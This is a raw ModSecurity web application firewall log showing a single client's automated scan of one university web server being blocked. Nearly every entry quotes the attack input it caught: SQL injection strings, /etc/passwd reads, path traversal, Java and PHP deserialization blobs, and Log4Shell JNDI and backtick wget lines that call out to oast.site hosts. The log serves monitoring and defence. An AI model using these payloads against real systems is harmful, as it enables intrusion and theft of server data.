[ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAARA7YgAAAAA"]
[Tue Aug 29 11:32:21.396505 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAN9sVMAAAAJ"]
[Tue Aug 29 11:32:22.500697 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQV4W0AAAA3"]
[Tue Aug 29 11:32:23.350851 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQ9H2kAAAAK"]
[Tue Aug 29 11:32:23.356751 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAARA7ZAAAAAA"]
[Tue Aug 29 11:32:25.323291 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQ9H28AAAAK"]
[Tue Aug 29 11:32:25.358105 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAARA7ZYAAAAA"]
[Tue Aug 29 11:32:27.483672 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPiBsQAAAAB"]
[Tue Aug 29 11:32:28.343320 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANWgbMAAAAG"]
[Tue Aug 29 11:32:30.308088 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQnGA4AAAAF"]
[Tue Aug 29 11:32:31.305116 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAPDoHAAAAAP"]
[Tue Aug 29 11:32:32.323876 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARMMbwAAAAR"]
[Tue Aug 29 11:32:32.389145 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARH7HkAAAAM"]
[Tue Aug 29 11:32:32.389191 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARH7HkAAAAM"]
[Tue Aug 29 11:32:35.360426 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg11ni5otsebaou.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg11ni5otsebaou.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlguxmhcskiitz17.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARD1O0AAAAH"]
[Tue Aug 29 11:32:36.357542 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQOv@YAAAAw"]
[Tue Aug 29 11:32:37.407621 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAPDoHcAAAAP"]
[Tue Aug 29 11:32:38.360019 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARH7IoAAAAM"]
[Tue Aug 29 11:32:38.569288 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARA7a4AAAAA"]
[Tue Aug 29 11:32:40.405130 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgryyhzr74mgn1w.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARD1PkAAAAH"]
[Tue Aug 29 11:32:42.510685 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAPDoIcAAAAP"]
[Tue Aug 29 11:32:46.409588 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARLXvcAAAAQ"]
[Tue Aug 29 11:32:47.532657 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARIwLQAAAAO"]
[Tue Aug 29 11:32:47.613209 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARH7KYAAAAM"]
[Tue Aug 29 11:32:49.412502 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAAPDoI4AAAAP"]
[Tue Aug 29 11:32:49.662886 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARA7b8AAAAA"]
[Tue Aug 29 11:32:51.463499 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARNk64AAAAS"]
[Tue Aug 29 11:32:59.317415 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4YAAAAu"]
[Tue Aug 29 11:32:59.358581 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LMAAAAM"]
[Tue Aug 29 11:32:59.710882 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgypigfy64d5nes.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARQ34YAAAAB"]
[Tue Aug 29 11:33:05.763063 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARH7MYAAAAM"]
[Tue Aug 29 11:33:09.404820 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARA7dMAAAAA"]
